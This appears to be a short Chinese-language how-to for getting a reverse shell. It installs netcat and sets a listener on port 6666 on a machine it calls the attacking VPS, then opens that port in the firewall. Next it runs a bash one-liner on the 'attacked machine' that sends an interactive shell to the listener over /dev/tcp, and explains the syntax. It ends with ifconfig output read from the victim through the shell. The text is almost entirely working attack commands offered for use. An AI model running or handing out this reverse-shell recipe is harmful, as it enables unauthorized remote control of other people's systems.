安装nc
yum -y install nc
在vps(用于攻击机器)机器监听6666端口,本机器ip地址为192.168.2.200
nc -lvnp 6666
需要开放vps的端口
- [root@localhost sc]# firewall-cmd --zone=public --add-port=6666/udp --permanent
- success
- [root@localhost sc]# firewall-cmd --reload
- success
在被攻击方机器执行(192.168.26.131)
bash -c 'exec bash -i &>/dev/tcp/192.168.2.200/6666 <&1'
解释
#bash -i 打开一个交互的bash
# >& 将标准错误输出重定向到标准输出
#/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port
# 0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互
在vps执行任意命令实行攻击
- [root@localhost gh]# ifconfig
- ifconfig
- eth0 Link encap:Ethernet HWaddr 01:0C:29:6E:37:0A
- inet addr:192.168.26.131 Bcast:192.168.26.255 Mask:255.255.255.0
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:22825 errors:0 dropped:0 overruns:0 frame:0
- TX packets:15829 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:15634385 (14.9 MiB) TX bytes:10275166 (9.7 MiB)
-
- lo Link encap:Local Loopback
- inet addr:127.0.0.1 Mask:255.0.0.0
- inet6 addr: ::1/128 Scope:Host
- UP LOOPBACK RUNNING MTU:16436 Metric:1
- RX packets:394 errors:0 dropped:0 overruns:0 frame:0
- TX packets:394 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:0
- RX bytes:40686 (39.7 KiB) TX bytes:40686 (39.7 KiB)